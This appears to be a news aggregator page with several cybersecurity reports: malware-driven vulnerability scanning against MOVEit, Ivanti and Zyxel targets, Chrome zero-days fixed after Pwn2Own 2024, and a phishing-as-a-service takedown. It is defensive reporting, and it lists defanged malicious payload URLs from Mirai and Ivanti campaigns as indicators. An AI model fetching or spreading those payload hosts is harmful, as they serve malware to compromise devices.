Russian cybersecurity firm Kaspersky says some iPhones on its network were hacked using an iOS vulnerability that installed malware via iMessage zero-click exploits. Russia blames these attacks on US intelligence agencies.
The all in one place for non-profit security aid.
Russian cybersecurity firm Kaspersky says some iPhones on its network were hacked using an iOS vulnerability that installed malware via iMessage zero-click exploits. Russia blames these attacks on US intelligence agencies.
Hackers Using Malware-Driven Scanning Attacks To Pinpoint Vulnerabilities
[[{“value”:”
Attackers are now using malware-infected devices to scan target networks instead of directly scanning them. This approach helps them to hide their identity, evade geographical restrictions (geofencing), and grow their botnets.
Compromised hosts provide more resources to launch large-scale scans than a single attacker machine could manage. Systems can effectively detect established and novel scanning patterns by analyzing scan characteristics like request volume and matching them with known threat signatures.
Attackers use scanning techniques to probe target networks for weaknesses, which can identify open ports, software vulnerabilities, and even operating systems.
By exploiting these vulnerabilities, attackers can gain unauthorized access or disrupt systems.
In the example, the attacker scans random-university.edu using an HTTP POST request to identify the MOVEit vulnerability (CVE-2023-34362), which can lead to a compromise if successful.
Analyzing traffic logs across multiple networks has identified a significant increase in scanning activity targeting potential vulnerabilities.
One example involved an unusually high request volume (7,147 times in 2023) to endpoints associated with the MOVEit vulnerability (CVE-2023-34362).
The requests appeared before the vulnerability was publicly known, and the telemetry further revealed over 66 million requests in 2023 that could be linked to scanning.
Attackers were observed using novel URLs within their exploits to bypass security measures.
Palo Alto Networks identified two such instances: a Mirai variant using “103.245.236[.]188/skyljne.mips” and an attempt to exploit Ivanti vulnerabilities with “45.130.22[.]219/ivanti.js”.
In both cases, the scanning requests preceded the detection of subsequent malicious payloads, highlighting the importance of proactive scanning detection for timely threat mitigation.
Attackers use malware to hijack infected devices and turn them into scanning machines by communicating with attacker-controlled servers for instructions and scanning target domains upon receiving a scan command.
The technique allows attackers to evade detection and use the resources of compromised devices for large-scale vulnerability scanning, where the targets can vary depending on the attacker’s goals, which could be focused attacks against specific entities or widespread scanning to infect more devices.
A Mirai variant exploit takes advantage of a Zyxel router vulnerability that does not check inputs thoroughly enough to download a malicious file and copy itself, which was used in a distributed attack where 2,247 devices scanned 15,812 targets.
The botnets keep incorporating new vulnerabilities and defenders need to patch vulnerabilities and update detection systems to block new variants, while monitoring scanning activities across multiple networks can help detect new scanning patterns more rapidly.
Chained vulnerabilities (CVE-2023-46805, CVE-2024-21887) were recently used in an attack campaign against Ivanti products, where the attackers used path traversal in a GET request to get around authentication for a path that had a command injection vulnerability.
It allowed them to execute commands and potentially gain access to vulnerable systems by using the attack to harvest the IP addresses of potential targets from a DNS logging service.
Attackers target common technologies like routers, web application frameworks, and collaboration tools, as data shows widespread vulnerability scans targeting routers, including recent attacks on Ubiquiti EdgeRouters and Cisco/NetGear routers by Russian and Chinese hackers, which are not limited to specific router brands.
Secure your emails in a heartbeat! To find your ideal email security vendor, Take a Free 30-Second Assessment.
The post Hackers Using Malware-Driven Scanning Attacks To Pinpoint Vulnerabilities appeared first on Cyber Security News.
“}]] Read More
Cyber Security News
Chrome Zero-Day Vulnerability Exploited At Pwn2Own : Patch Now
[[{“value”:”
Google fixed three vulnerabilities in the Chrome browser on Tuesday, along with another zero-day exploit that was exploited during the Pwn2Own Vancouver 2024 hacking contest.
Google recently fixed two more zero-day vulnerabilities that were exploited during the Pwn2Own hacking competition.
Palo Alto Networks’ Edouard Bochin (@le_douds) and Tao Yan (@Ga1ois) reported the vulnerability identified as CVE-2024-3159 on March 22, 2024, during Pwn2Own 2024.
Both of them received $42,500 and 9 Master of Pwn points for successfully showcasing their attack against Microsoft Edge and Google Chrome.
Confirmed! @le_douds and @Ga1ois from Palo Alto used an OOB Read plus a novel technique for defeating V8 hardening to get arbitrary code execution in the renderer. The were aboe to exploit #Chrome and #Edge with the same bugs, earning $42,500 and 9 Master of Pwn points. #Pwn2Own pic.twitter.com/EhFIEntnPw
— Zero Day Initiative (@thezdi) March 21, 2024
Google has fixed the vulnerabilities in the Google Chrome Stable channel to 123.0.6312.105/.106/.107 for Windows and Mac and 123.0.6312.105 for Linux. The update will be rolled out in the upcoming days and weeks.
The CVE-2024-3159 vulnerability is an out-of-bounds memory access in the V8 JavaScript engine.
By deceiving the victim into visiting a specially created HTML page, a remote attacker can exploit this vulnerability and obtain access to data that is beyond the memory buffer, so causing heap corruption.
The exploitation of vulnerability may cause a crash or the exposing of sensitive data.
On the second day of Pwn2Own, security researchers Edouard Bochin and Tao Yan from Palo Alto Networks demonstrated the zero-day.
Google also fixed inappropriate implementation in V8, which has been identified as CVE-2024-3156.
Following Zhenghang Xiao’s (@Kipreyyy) disclosure of the issue, Google granted a reward of $7,000.
CVE-2024-3158, Use after free in Bookmarks, was also fixed by Google. After undoingfish reported the issue, Google offered $3000 as a reward.
To view the most recent version on desktop devices, Google Chrome users can navigate to Menu > Help > About Google Chrome or type chrome://settings/help into the address bar.
The browser looks for updates as soon as the website is accessed; it downloads and installs any that it finds. It ought to detect and install the latest version.
To finish the update, the browser must be restarted.
“Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed”, Google said.
Google patched multiple Chrome browser vulnerabilities at the end of March, including two zero-day vulnerabilities that were disclosed during the Pwn2Own 2024. These vulnerabilities are identified as CVE-2024-2886 and CVE-2024-2887.
Mozilla also addresses two zero-day vulnerabilities tracked as CVE-2024-29944 and CVE-2024-29943 that were recently exploited by Manfred Paul (@_manfp) at the Pwn2Own hacking contest in the Firefox web browser.
Is Your Network Under Attack? – Read CISO’s Guide to Avoiding the Next Breach – Download Free Guide
The post Chrome Zero-Day Vulnerability Exploited At Pwn2Own : Patch Now appeared first on Cyber Security News.
“}]] Read More
Cyber Security News
Major Phishing-as-a-Service Syndicate ‘BulletProofLink’ Dismantled by Malaysian Authorities
Malaysian law enforcement authorities have announced the takedown of a phishing-as-a-service (PhaaS) operation called BulletProofLink.
The Royal Malaysian Police said the effort, which was carried out with assistance from the Australian Federal Police (AFP) and the U.S. Federal Bureau of Investigation (FBI) on November 6, 2023, was based on information that the threat actors behind the platform Read More
The Hacker News | #1 Trusted Cybersecurity News Site